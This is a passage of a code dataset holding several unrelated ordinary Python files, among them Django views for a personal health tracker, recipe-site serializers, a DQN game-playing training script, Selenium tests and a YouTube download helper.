last_n_days(7)]\n\thappy_objects = HappyLog.objects.all().filter(date__in=last_week)\n\ths_objects = HappyScore.objects.all().filter(date__in=last_week)\n\trand_happiness = happy_objects[randint(0,len(happy_objects)-1)]\n\tavg_hs = round(sum([h.score for h in hs_objects])/float(len(hs_objects)),1)\n\t\n\tif avg_hs >= 7:\n\t\thappy_grade = GOOD\n\telif avg_hs >= 5:\n\t\thappy_grade = OK\n\telse:\n\t\thappy_grade = BAD\n\n\treturn {'rand_happiness' : rand_happiness,\n\t\t\t'avg_hs' : avg_hs,\n\t\t\t'happy_grade' : happy_grade }\n\ndef get_today():\n\tt = datetime.datetime.now() - datetime.timedelta(hours=7)\n\treturn datetime.date(t.year,t.month,t.day)\n\ndef get_index_of_today():\n\tall_days = Day.objects.order_by('-date')\n\ttry:\n\t\ttoday = Day.objects.get(date=get_today())\n\t\tindex = 0\n\t\twhile True:\n\t\t\tif all_days[index] == today:\n\t\t\t\treturn index\n\t\t\tprint(all_days[index],index)\n\t\t\tindex += 1\n\texcept:\n\t\treturn 0\n\ndef last_n_days(n):\n\tall_days = Day.objects.order_by('-date')\n\ttoday_index = get_index_of_today()\n\tif len(all_days)-today_index >= n:\n\t\tprint(all_days[today_index:today_index+n])\n\t\treturn all_days[today_index:today_index+n]\n\tprint('here')\n\treturn all_days[today_index:]\n\ndef objects_given_days(objects, dates):\n\treturn objects.filter(date__in=dates)\n\t\ndef 
duration(start,end):\n startdelta=datetime.timedelta(hours=start.hour,minutes=start.minute,seconds=start.second)\n enddelta=datetime.timedelta(hours=end.hour,minutes=end.minute,seconds=end.second)\n return (enddelta-startdelta).seconds/float(60)/float(60)\n\n# def utc_to_local(utc_dt):\n# # get integer timestamp to avoid precision lost\n# timestamp = calendar.timegm(utc_dt.timetuple())\n# local_dt = datetime.fromtimestamp(timestamp)\n# assert utc_dt.resolution >= timedelta(microseconds=1)\n# return local_dt.replace(microsecond=utc_dt.microsecond)\n\t\t\n## SLEEP HELPERS ## \n\n# given a set of sleep objects, calculate hours slept\ndef avg_hours_slept(sleep_objects):\n\thours_array = []\n\tfor s in sleep_objects:\n\t\thours_array.append(s.total_sleep_hours())\n\treturn round(float(sum(hours_array)) / len(hours_array),1)\n\n# calculate average time i went to bed\ndef avg_time_in_bed(sleep_objects):\n\ttime_sum = 0\n\ttimes = [time_to_absolute(s.time_slept) for s in sleep_objects]\n\tfor t in times:\n\t\ttime_sum += t.minute + t.hour*60\n\tavg = int(time_sum/float(len(sleep_objects)))\n\treturn absolute_to_time(datetime.time(avg/60, avg%60))\n\ndef time_to_absolute(time):\n\tif time < datetime.time(12,0):\t#before 12pm\n\t\treturn datetime.time(time.hour+12,time.minute)\n\telse:\n\t\treturn datetime.time(time.hour-12,time.minute)\n\ndef absolute_to_time(time):\n\tif time > datetime.time(12,0):\t\n\t\treturn datetime.time(time.hour-12,time.minute)\n\telse:\n\t\treturn datetime.time(time.hour+12,time.minute)\n\n## FOOD HELPERS ##\n\t\ndef percent_days_exercised(exercise_objects,date_list):\n\tnum_days = len(date_list)\n\tdays_no_ex = 0\n\tfor d in date_list:\n\t\tif not exercise_objects.filter(date=d):\n\t\t\tdays_no_ex += 1\n\treturn num_days - days_no_ex\n\ndef types_exercised(exercise_objects):\n\ttypes = set()\n\tfor e in exercise_objects:\n\t\tif e.exercise_type not in types:\n\t\t\ttypes.add(e.exercise_type)\n\treturn types\n\ndef get_today_str():\n\treturn get_today().strftime('%Y%m%d')\n\ndef get_day_before_str(date):\n\treturn (date-datetime.timedelta(days=1)).strftime('%Y%m%d')\n\ndef get_day_after_str(date):\n\treturn (date+datetime.timedelta(days=1)).strftime('%Y%m%d')\n\n#returns array for graphing sleep\ndef sleep_array():\n\tsleep = Sleep.objects.all()\n\tsleep_array = [[0,24]]\n\tfor i in range(0,29):\n\t\ts = sleep[i]\n\t\tbed_hours = duration(s.time_slept,s.time_awake)\n\t\ttime_slept = (s.time_slept.hour+s.time_slept.minute/float(60) + 6) % 24 # start at 6pm\n\t\tsleep_array.append([time_slept, bed_hours])\t\n\treturn sleep_array\n\t\t\n# assume three meals a day\n# input = list of gluten free or paleo scores\ndef percent_healthy_meals(food_scores):\n\treturn float(sum(food_scores)) / len(food_scores)*3\n\t\n# def percent_days_exercised(exercise_objects,num_days):\n# \texercise_objects.filter\n\t\n#returns a string\n# def calculate_sleep(s):\n# \tbed_hours = duration(s.time_slept,s.time_awake) + float(s.hours_napped)\n# \tif s.hours_napped > 0: \n# \t\treturn str(round(bed_hours,1)) + \" (\" + str(s.hours_napped) +\")\"\n# \treturn round(bed_hours,1)\n# \n# def calculate_sleep_hours(s):\n# \treturn duration(s.time_slept,s.time_awake) + float(s.hours_napped)\n\n# pages\n@login_required\t\ndef index(request):\n\ttemplate = loader.get_template('data/index.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list(),\n\t\t'today_str' : get_today_str()\n\t})\n\treturn HttpResponse(template.render(context))\n\ndef happiness(request):\n\ttemplate = 
loader.get_template('data/happiness.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list()\n\t})\n\treturn HttpResponse(template.render(context))\n\t\ndef sleep(request):\n\ttemplate = loader.get_template('data/sleep.html')\n\tcontext = RequestContext(request, {\n\t\t'day_log' : get_day_list(),\n\t\t'sleep_array' : sleep_array()\n\t})\n\treturn HttpResponse(template.render(context))\n\n@login_required\t\ndef summary(request):\n\ttemplate = loader.get_template('data/summary.html')\n\tcontext = RequestContext(request, {\n\t\t'sleep_summary' : get_sleep_summary(),\n\t\t'food_summary' : get_food_summary(),\n\t\t'exercise_summary' : get_exercise_summary(),\n\t\t'happy_summary' : get_happiness_summary(),\n\t\t'good_text' : 'good_text',\n\t\t'today_str' : get_today_str()\n\t})\n\treturn HttpResponse(template.render(context))\n\n@login_required\t\ndef edit(request,date):\n\ttry:\n\t\tformatted_date = date[0:4]+'-'+date[4:6]+'-'+date[6:]\n\t\ttry:\n\t\t\tcurrent_day = Day.objects.get(date=formatted_date)\n\t\texcept:\n\t\t\tcurrent_day = Day(date=formatted_date)\n\t\t\tcurrent_day.save()\n\texcept:\n\t\treturn HttpResponse(\"fail\")\n\tdatetime_date = datetime.date(int(date[0:4]),int(date[4:6]),int(date[6:]))\n\tday_before_str = get_day_before_str(datetime_date)\n\tday_after_str = get_day_after_str(datetime_date)\n\thappy_formset = None\n\tHappyFormSet = modelformset_factory(HappyLog, exclude=('day','date',),extra=1)\n\tUnhappyFormSet = modelformset_factory(UnhappyLog, exclude=('day','date',),extra=1)\n\tExerciseFormSet = modelformset_factory(Exercise, exclude=('day','date',))\n\n\t# saving content\n\tif request.method =='POST':\n\t\ttry:\n\t\t\tsleep_instance = Sleep.objects.get(day=current_day)\n\t\t\tsleep_form = SleepForm(request.POST, prefix = 'sleep', instance=sleep_instance)\n\t\texcept:\n\t\t\tsleep_form = SleepForm(request.POST, prefix = 'sleep')\n\t\ttry:\n\t\t\tinst = FoodScore.objects.get(day=current_day)\n\t\t\tfood_form = FoodForm(request.POST, prefix = 'food', instance=inst)\n\t\texcept:\n\t\t\tfood_form = FoodForm(request.POST,prefix = 'food')\n\t\ttry:\n\t\t\tinst = HappyScore.objects.get(day=current_day)\n\t\t\ths_form = HSForm(request.POST, prefix = 'hs', instance=inst)\n\t\texcept:\n\t\t\ths_form = HSForm(request.POST,prefix = 'hs')\n\t\t\n\t\thappy_formset = HappyFormSet(request.POST, prefix = 'happy')\n\t\tunhappy_formset = UnhappyFormSet(request.POST, prefix = 'unhappy')\n\t\texercise_formset = ExerciseFormSet(request.POST, prefix = 'exercise')\n\t\t\n\t\tfor formset in [happy_formset, unhappy_formset, exercise_formset]:\n\t\t\tinstances = formset.save(commit=False)\n\t\t\tfor i in instances:\n\t\t\t\tif i.day == None:\n\t\t\t\t\ti.day = current_day\n\t\t\t\t\ti.date = current_day.date\n\t\t\t\ti.save()\n\t\t\n\t\tfor form in [sleep_form, food_form, hs_form]:\n\t\t\tif form.is_valid():\n\t\t\t\tnew_data = form.save(commit=False)\n\t\t\t\tnew_data.day = current_day\n\t\t\t\tnew_data.date = current_day.date\n\t\t\t\tnew_data.save()\n\t\n\t# creating forms\n\ttry:\n\t\tsleep_instance = Sleep.objects.get(day=current_day)\n\t\tsleep_form = SleepForm(prefix = 'sleep', instance=sleep_instance)\n\texcept:\n\t\tsleep_form = SleepForm(prefix = 'sleep')\n\ttry:\n\t\tinst = FoodScore.objects.get(day=current_day)\n\t\tfood_form = FoodForm(prefix = 'food', instance=inst)\n\texcept:\n\t\tfood_form = FoodForm(prefix = 'food')\n\ttry:\n\t\tinst = HappyScore.objects.get(day=current_day)\n\t\ths_form = HSForm(prefix = 'hs', instance=inst)\n\texcept:\n\t\ths_form = 
HSForm(prefix = 'hs')\n\thappy_formset = HappyFormSet(prefix = 'happy', queryset=HappyLog.objects.filter(day=current_day))\n\tunhappy_formset = UnhappyFormSet(prefix = 'unhappy',queryset=UnhappyLog.objects.filter(day=current_day))\n\texercise_formset = ExerciseFormSet(prefix = 'exercise',queryset=Exercise.objects.filter(day=current_day))\n\t\t\n\treturn render(request, 'data/edit.html', {\n\t\t'current_day': current_day,\n\t\t'sleep_form': sleep_form,\n\t\t'food_form': food_form,\n\t\t'hs_form': hs_form,\n\t\t'happy_formset': happy_formset,\n\t\t'unhappy_formset': unhappy_formset,\n\t\t'exercise_formset': exercise_formset,\n\t\t'day_before_str':day_before_str,\n\t\t'day_after_str':day_after_str,\n\t\t'today_str': get_today_str()\n\t\t\n\t})\n\t","repo_name":"theyiwen/reportersite","sub_path":"data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27903037765","text":"\"\"\"Common testing infrastructure.\"\"\"\n\nimport pathlib\n\nimport numpy as np\n\n\n# Base directory of the test results.\n_RESULT_PATH = pathlib.Path(__file__).parent.resolve() / \"results\"\n\n\ndef get_result_path(relative_path, unit=True):\n \"\"\"\n Form the absolute path to the results test file.\n\n Parameters\n ----------\n relative_path : str, path, iterable str/path\n The relative path to the target test file.\n unit : bool, optional\n Specify whether the `relative_path` is for a unit test.\n Default is True.\n\n Returns\n -------\n Path\n The absolute result path.\n\n \"\"\"\n if isinstance(relative_path, str):\n relative_path = pathlib.Path(relative_path)\n\n if not isinstance(relative_path, pathlib.PurePath):\n relative_path = pathlib.Path(*relative_path)\n\n if unit:\n relative_path = pathlib.Path(\"unit\") / relative_path\n\n result = _RESULT_PATH / relative_path\n\n return result.resolve(strict=True)\n\n\ndef make_grid_args(nx, ny):\n \"\"\"\n Return arguments for a small grid.\n\n Parameters\n ----------\n nx : int\n The number of cells spanned by the longitude.\n ny : int\n The number of cells spanned by the latutude\n\n Returns\n -------\n Tuple\n Arguments which can be passed to\n :class:`~esmf_regrid.esmf_regridder.GridInfo.make_esmf_field`\n \"\"\"\n small_grid_lon = np.array(range(nx)) * 10 / nx\n small_grid_lat = np.array(range(ny)) * 10 / ny\n\n small_grid_lon_bounds = np.array(range(nx + 1)) * 10 / nx\n small_grid_lat_bounds = np.array(range(ny + 1)) * 10 / ny\n return (\n small_grid_lon,\n small_grid_lat,\n small_grid_lon_bounds,\n small_grid_lat_bounds,\n )\n","repo_name":"SciTools-incubator/iris-esmf-regrid","sub_path":"esmf_regrid/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"36367840987","text":"from copy import deepcopy, copy\nfrom termcolor import colored\nimport sys\n \n\n\n\nclass IslSchedule():\n \"\"\" Types:\n schedule_object: list of integers and IvieIterators.\"\"\"\n \n def __init__(self, name, objects):\n #self.schedule_string = string\n #self.schedule_list_string = list_string\n self.name = name\n self.schedule_object = objects\n \n\n def debug_print(self):\n string = \"## Begin [\\n\"\n for obj in self.schedule_object:\n if isinstance(obj, int):\n string += str(obj)\n else:\n string += obj.debug_print()\n string += \", \\n\"\n\n string += \"] ## End\"\n return string\n\n def 
translate_into_string(self, maxlen):\n string = \"[\" + str(self.schedule_object[0])\n itertypes = [\"IvieIteratorIterator\", \"IvieIteratorTile\", \n \"IvieIteratorAxetraversor\",\"IvieIteratorReplicate\"]\n for data in self.schedule_object[1:]:\n if isinstance(data, int):\n string += \", \" +str(data)\n elif data.__class__.__name__ in itertypes:\n string += \", \" + data.name\n else:\n pass\n\n ## Schedules lengths need to be aligned \n ## we therefore fill with 0 remaining \n ## slots\n cp = maxlen\n if len(self.schedule_object) < cp:\n gap = cp - len(self.schedule_object)\n\n for i in range(0, gap):\n string += \", \" + str(0)\n \n string += \"]\"\n return string\n \n\n\nclass Program():\n tensors = []\n code = \"\"\n maxiter = 1\n def __init__(self, tensors, code):\n self.tensors = tensors\n self.code = code\n\n \"\"\"\n def __init__(self, rarrays, varrays, iterators, loops, scheduler, statements, dependencies):\n self.physical_arrays = rarrays\n self.virtual_arrays = varrays\n self.iterators = iterators\n self.loops = loops\n self.scheduler = scheduler\n self.statements = statements\n self.dependencies = dependencies\n self.isl_loop_schedules_str = None\n self.isl_loop_schedules = None\n self.isl_loop_domains = None\n self.isl_program = None\n self.max_schedule = None\n self.mpi = False\n self.cuda = False\n self.variants = []\n \n def add_program_variant(self, variant):\n self.variants.append(variant)\n\n def set_isl_loop_schedules(self, schedules):\n self.isl_loop_schedules = schedules\n\n def set_isl_loop_domains(self, domains):\n self.isl_loop_domains = domains\n\n def set_isl_program(self, prog):\n self.isl_program = prog\n \n def set_isl_loop_schedules_str(self, str_):\n self.isl_loop_schedules_str = str_\n\n def set_max_schedule(self, max_):\n self.max_schedule = max_\n\n def debug_print(self):\n string = \" -- Physical arrays -- \\n\\n\"\n for array in self.physical_arrays:\n string += array.debug_print() + \"\\n\"\n \n string += \"\\n -- Virtual arrays -- \\n\\n\"\n for array in self.virtual_arrays:\n string += array.debug_print()+ \"\\n\"\n\n string += \"\\n -- Iterators -- \\n\\n\"\n for iterator in self.iterators:\n string += iterator.debug_print() + \"\\n\"\n\n string += \"\\n -- Loops -- \\n\\n\"\n for loop in self.loops:\n string += loop.debug_print() + \"\\n\"\n \n string += \"\\n -- Transformations scheduler -- \\n\\n\"\n for scheduled in self.scheduler:\n if scheduled != None:\n string += scheduled.debug_print() + \"\\n\"\n \n string += \"\\n -- Isl loop schedules -- \\n\\n\"\n if self.isl_loop_schedules != None:\n for schedule in self.isl_loop_schedules:\n string += schedule.debug_print() + \"\\n\"\n\n return string\n\n \"\"\"\n","repo_name":"Adilla/teml","sub_path":"include/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"254736249","text":"class Solution:\n def findUnsortedSubarray(self, nums: List[int]) -> int:\n n, start, end = len(nums), 0, len(nums)-1\n \n while start < n-1 and nums[start] <= nums[start+1]:\n start += 1\n \n if start == n-1 : return 0\n \n while end > 0 and nums[end] >= nums[end -1]:\n end -= 1\n \n tempMin, tempMax = min(nums[start:end+1]), max(nums[start: end+1])\n \n while start > 0 and nums[start -1] > tempMin:\n start -= 1\n \n while end < n-1 and nums[end + 1] < tempMax:\n end += 1\n \n return end - start + 1\n ","repo_name":"gdsaikrishna/leet_code","sub_path":"581. 
Shortest Unsorted Continuous Subarray.py","file_name":"581. Shortest Unsorted Continuous Subarray.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74587942887","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User as BaseUser\nfrom Recipes.models import Recipe, Ingredient, Category, Comment, Rating, User\nfrom Recipes.recommender import propose_recipes\n\n\nclass DynamicFieldsModelSerializer(serializers.ModelSerializer):\n \"\"\"\n A ModelSerializer that takes an additional `fields` argument that\n controls which fields should be displayed.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n try:\n fields = kwargs['context']['request'].query_params.get('fields', None)\n except KeyError:\n fields = None\n # Instantiate the superclass normally\n super(DynamicFieldsModelSerializer, self).__init__(*args, **kwargs)\n\n if fields:\n fields = fields.split(',')\n # Drop any fields that are not specified in the `fields` argument.\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n\n\nclass ReplacementSerializer(serializers.ModelSerializer):\n class Meta:\n model = Ingredient\n fields = ['name']\n extra_kwargs = {\n 'name': {'validators': []},\n }\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n replacements = ReplacementSerializer(many=True)\n\n # replacements = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Ingredient.objects.all())\n\n class Meta:\n model = Ingredient\n fields = '__all__'\n extra_kwargs = {\n 'name': {'validators': []},\n }\n\n def create(self, validated_data):\n replacements_data = validated_data.pop('replacements')\n ingredient = Ingredient.objects.create(**validated_data)\n for replacement_data in replacements_data:\n try:\n replacement = Ingredient.objects.get(name=replacement_data['name'])\n ingredient.replacements.add(replacement)\n except Ingredient.DoesNotExist:\n continue\n return ingredient\n\n\nclass LimitedRecipeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Recipe\n fields = ['id', 'title', 'time']\n\n\nclass RecipeSerializer(DynamicFieldsModelSerializer, serializers.ModelSerializer):\n categories = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Category.objects.all())\n # ingredients = serializers.SlugRelatedField(many=True, slug_field='name', queryset=Ingredient.objects.all())\n ingredients = IngredientSerializer(many=True)\n\n class Meta:\n model = Recipe\n fields = '__all__'\n\n def create(self, validated_data):\n ingredients_data = validated_data.pop('ingredients')\n categories_data = validated_data.pop('categories')\n recipe = Recipe.objects.create(**validated_data)\n for ingredient_data in ingredients_data:\n try:\n ingredient = Ingredient.objects.get(name=ingredient_data['name'])\n recipe.ingredients.add(ingredient)\n except KeyError:\n continue\n # for category_data in categories_data:\n # category = Category.objects.get(name=category_data['name'])\n # recipe.categories.add(category)\n recipe.categories.add(*categories_data) # slug related field stores list of objects\n recipe.save()\n return recipe\n\n def update(self, recipe, validated_data):\n logged_user = self.context['request'].user\n form_user = validated_data.pop('user')\n\n if logged_user.id == form_user.basic_info_id and logged_user.id == recipe.user.basic_info_id:\n ingredients_data = 
validated_data.pop('ingredients')\n categories_data = validated_data.pop('categories')\n\n for attr, value in validated_data.items():\n setattr(recipe, attr, value)\n\n recipe.ingredients.clear()\n\n for ingredient_data in ingredients_data:\n try:\n ingredient = Ingredient.objects.get(name=ingredient_data['name'])\n recipe.ingredients.add(ingredient)\n except KeyError:\n continue\n\n recipe.categories.clear()\n recipe.categories.add(*categories_data)\n\n recipe.save()\n return recipe\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = '__all__'\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(slug_field='nickname', queryset=User.objects.all())\n\n class Meta:\n model = Comment\n fields = '__all__'\n\n\nclass RatingSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(slug_field='nickname', queryset=User.objects.all())\n\n class Meta:\n model = Rating\n fields = '__all__'\n\n\nclass BaseUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = BaseUser\n extra_kwargs = {'password': {'write_only': True}}\n fields = ['username', 'password', 'email']\n\n\nclass UserSerializer(serializers.ModelSerializer):\n basic_info = BaseUserSerializer()\n favourite_recipes = LimitedRecipeSerializer(many=True, read_only=True)\n top_rated_recipes = serializers.SerializerMethodField()\n recommended_recipes = serializers.SerializerMethodField()\n my_recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = '__all__'\n\n def create(self, validated_data):\n basic_data = validated_data.pop('basic_info')\n favourite_recipes = validated_data.pop('favourite_recipes', [])\n base_user = BaseUser.objects.create_user(**basic_data)\n user = User.objects.create(basic_info=base_user, **validated_data)\n user.favourite_recipes.add(*favourite_recipes)\n return user\n\n def get_top_rated_recipes(self, user):\n ratings = Rating.objects.filter(user__pk=user.pk).order_by('-score')[:3]\n recipes = [rating.recipe for rating in ratings]\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n def get_recommended_recipes(self, user):\n recipes = propose_recipes(\n User.objects.prefetch_related('favourite_recipes').get(pk=user.pk).favourite_recipes.all(),\n Recipe.objects.prefetch_related('categories', 'ingredients'),\n list(Category.objects.all()), list(Ingredient.objects.all()))\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n def get_my_recipes(self, user):\n recipes = Recipe.objects.filter(user__pk=user.pk)\n serializer = LimitedRecipeSerializer(recipes, many=True)\n return serializer.data\n\n\nclass DynamicRegistrationSerializer(serializers.Serializer):\n email = serializers.EmailField()\n","repo_name":"kacperwnuk/RecipesSite","sub_path":"Recipes/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33543550811","text":"import time\r\nimport retro\r\nimport random\r\nimport torch\r\nimport numpy as np\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport os\r\nimport pandas as pd\r\nimport argparse\r\n\r\nfrom algos.agents.dqn_agent import DQNAgent\r\nfrom algos.models.dqn_cnn import DQNCnn\r\nfrom algos.preprocessing.stack_frame import preprocess_frame, stack_frame\r\nfrom datetime import timedelta\r\n\r\nparser = 
argparse.ArgumentParser(description='Training')\r\nparser.add_argument('--train', action='store_true', help='Train')\r\nparser.add_argument('--model_epoch',default='1000', type=str, help='Which model to load? Specify the epoch.')\r\nopt = parser.parse_args()\r\n\r\nmodel_epoch = opt.model_epoch\r\n\r\nif opt.train:\r\n print('This is training phase\\n')\r\nelse:\r\n print('This is test phase, model: ' + model_epoch + 'th epoch\\n')\r\n\r\nenv = retro.make(game='RoboCop3-Genesis')\r\nenv.seed(0)\r\n\r\n# if gpu is to be used\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nprint(\"Device: \", device)\r\n\r\nprint(\"The size of frame is: \", env.observation_space.shape)\r\nprint(\"No. of Actions: \", env.action_space.n)\r\n\r\npossible_actions = np.array(np.identity(env.action_space.n,dtype=int).tolist())\r\n\r\ndef stack_frames(frames, state, is_new=False):\r\n frame = preprocess_frame(state, (1, -1, -1, 1), 84)\r\n frames = stack_frame(frames, frame, is_new)\r\n\r\n return frames\r\n\r\nINPUT_SHAPE = (4, 84, 84)\r\nACTION_SIZE = len(possible_actions)\r\nSEED = 0\r\nGAMMA = 0.99 # discount factor\r\nBUFFER_SIZE = 100000 # replay buffer size\r\nBATCH_SIZE = 32 # Update batch size\r\nLR = 0.0001 # learning rate\r\nTAU = 1e-3 # for soft update of target parameters\r\nUPDATE_EVERY = 100 # how often to update the network\r\nUPDATE_TARGET = 10000 # After which thershold replay to be started\r\nEPS_START = 0.99 # starting value of epsilon\r\nEPS_END = 0.3 # Ending value of epsilon\r\nEPS_DECAY = 30 # Rate by which epsilon to be decayed\r\n\r\nagent = DQNAgent(INPUT_SHAPE, ACTION_SIZE, SEED, device, BUFFER_SIZE, BATCH_SIZE, GAMMA, LR, TAU, UPDATE_EVERY, UPDATE_TARGET, DQNCnn, opt.train, model_epoch)\r\n\r\nstart_epoch = 0\r\nscores = []\r\nscores_window = deque(maxlen=20)\r\nscores_info = []\r\nscores_window_info = deque(maxlen=20)\r\n\r\nepsilon_by_epsiode = lambda frame_idx: EPS_END + (EPS_START - EPS_END) * math.exp(-1. 
* frame_idx /EPS_DECAY)\r\n\r\n# plt.plot([epsilon_by_epsiode(i) for i in range(1000)])\r\n\r\nmodel_dir = 'model/model_dqn'\r\nif not os.path.exists(model_dir):\r\n os.makedirs(model_dir)\r\n\r\ndef train(n_episodes=1000):\r\n \"\"\"\r\n Params\r\n ======\r\n n_episodes (int): maximum number of training episodes\r\n \"\"\"\r\n env.viewer = None\r\n start_time_total = time.time()\r\n for i_episode in range(start_epoch + 1, n_episodes + 1):\r\n start_time = time.time()\r\n state = stack_frames(None, env.reset(), True)\r\n score = 0\r\n score_info = 0\r\n\r\n eps = epsilon_by_epsiode(i_episode)\r\n\r\n # Punish the agent for not moving forward\r\n prev_state = {}\r\n timestamp = 0\r\n while timestamp < 10000:\r\n env.render(close=False)\r\n action = agent.act(state, eps)\r\n next_state, reward, done, info = env.step(possible_actions[action])\r\n score_info = info['score']\r\n\r\n timestamp += 1\r\n\r\n if timestamp > 1:\r\n if (prev_state['ammo'] < info['ammo']):\r\n reward += 5\r\n # Punish the agent for wasting ammo\r\n if (info['ammo'] == 0):\r\n reward -= 5\r\n if (info['ammo'] == 0 and info['health'] == 0):\r\n reward -= 20\r\n if (prev_state['ammo'] > info['ammo'] and prev_state['score'] < info['score']):\r\n reward += 700\r\n if (info['score'] == 0):\r\n reward -= 5\r\n\r\n prev_state = info\r\n score += reward\r\n\r\n next_state = stack_frames(state, next_state, False)\r\n agent.step(state, action, reward, next_state, done)\r\n state = next_state\r\n if done:\r\n break\r\n scores_window.append(score) # save most recent score\r\n scores.append(score) # save most recent score\r\n scores_info.append(score_info)\r\n scores_window_info.append(score_info)\r\n\r\n time_taken = str(timedelta(seconds=(time.time() - start_time)))\r\n print('\\rEpisode {}\\tAvg Score: {:.2f}\\tAvg Score Info: {:.2f}\\tEpsilon: {:.2f}\\tTime taken: {}'.format(i_episode, np.mean(scores_window), np.mean(scores_window_info), eps, time_taken),\r\n end=\"\")\r\n\r\n if i_episode % 100 == 0:\r\n torch.save(agent.policy_net.state_dict(), os.path.join(model_dir, str(i_episode) + '_policy.pt'))\r\n torch.save(agent.target_net.state_dict(), os.path.join(model_dir, str(i_episode) + '_target.pt'))\r\n scores_save = pd.DataFrame({'Scores': scores})\r\n scores_save['Scores Info'] = scores_info\r\n scores_save.to_csv(model_dir + '/' + str(i_episode) + '_' + 'train_scores.csv', sep=',', encoding='utf-8',\r\n header=True, index=None)\r\n\r\n time_taken_total = str(timedelta(seconds=(time.time() - start_time_total)))\r\n print(\"\\nTotal time taken: \" + time_taken_total)\r\n\r\n return scores, scores_info\r\n\r\n\r\nif opt.train:\r\n scores, scores_info = train(1300)\r\n\r\nenv.viewer = None\r\nstate = stack_frames(None, env.reset(), True)\r\nfor j in range(10000):\r\n env.render(close=False)\r\n action = agent.act_test(state, eps=0.3)\r\n next_state, reward, done, _ = env.step(possible_actions[action])\r\n state = stack_frames(state, next_state, False)\r\n if done:\r\n env.reset()\r\n break\r\nenv.render(close=True)","repo_name":"ishakdavidk/Reinforcement-Learning","sub_path":"Robocop 3 Genesis - DQN/robocop_dqn.py","file_name":"robocop_dqn.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1335788068","text":"# -*- coding: utf-8 -*-\n# Time : 2022/4/3 10:32\n# Author : 33\n# File : log.py\n# Desc :\nimport logging\nfrom git_hub.config.config import 
log_file\n# create the logger\nloggers=logging.getLogger('simple')\n# set the logger's level\nloggers.setLevel(logging.INFO)\n# define the handler's output format\nformatter=logging.Formatter(\"%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s %(message)s\")\nlogFile=log_file\n# create the handler\nfh=logging.FileHandler(log_file,mode='a',encoding='utf-8')\n# set the handler's level\nfh.setLevel(logging.INFO)\n# set the handler's format\nfh.setFormatter(formatter)\n# attach the handler to the logger\nloggers.addHandler(fh)\n\n\n\n","repo_name":"284322480/test_4_8_unittest","sub_path":"log/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23084903506","text":"from .pages.recent_page import RecentPage\nfrom .yadi_disk_api import API\n\n\nclass TestUserRecent:\n def test_upload_file(self, new_file, browser):\n link = \"https://disk.yandex.ru/client/recent\"\n page = RecentPage(browser, link)\n page.open()\n page.should_be_folder_or_file(new_file)\n\n def test_delete_file(self, new_file, browser):\n link = \"https://disk.yandex.ru/client/recent\"\n page = RecentPage(browser, link)\n page.open()\n disk = API()\n page.should_be_folder_or_file(new_file)\n disk.delete_file_or_folder(new_file)\n page.should_not_be_folder_or_file(new_file)\n","repo_name":"17cyber17/yadi_disk_api_test","sub_path":"test_recent_page.py","file_name":"test_recent_page.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39908359809","text":"# urllib\nimport urllib\nimport urllib3\n\n# beautiful soup\nfrom bs4 import BeautifulSoup\n\n# pytube\nfrom pytube import YouTube\nfrom pytube import exceptions\n\nQUERY_URL = 'https://www.youtube.com/results?search_query='\nBASE_URL = 'https://www.youtube.com'\n\n\ndef get_urls(keyword):\n query = urllib.parse.quote(keyword)\n http = urllib3.PoolManager()\n res = http.request('GET', '{}{}'.format(QUERY_URL, query))\n html = res.data\n bs = BeautifulSoup(html, \"html.parser\")\n return ['{}{}'.format(BASE_URL, video['href']) for video in bs.findAll(attrs={'class': 'yt-uix-tile-link'})]\n\n\ndef download_videos(videos, directory):\n try:\n for video in videos:\n YouTube(video).streams.first().download(output_path=directory)\n print(\"Successfully downloaded {} to {}\".format(video, directory))\n except exceptions.PytubeError as error:\n print(error)\n\n\n\n\n\n","repo_name":"rochester-rcl/dhsi-multimedia-examples","sub_path":"dhsi_multimedia/yt_helper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
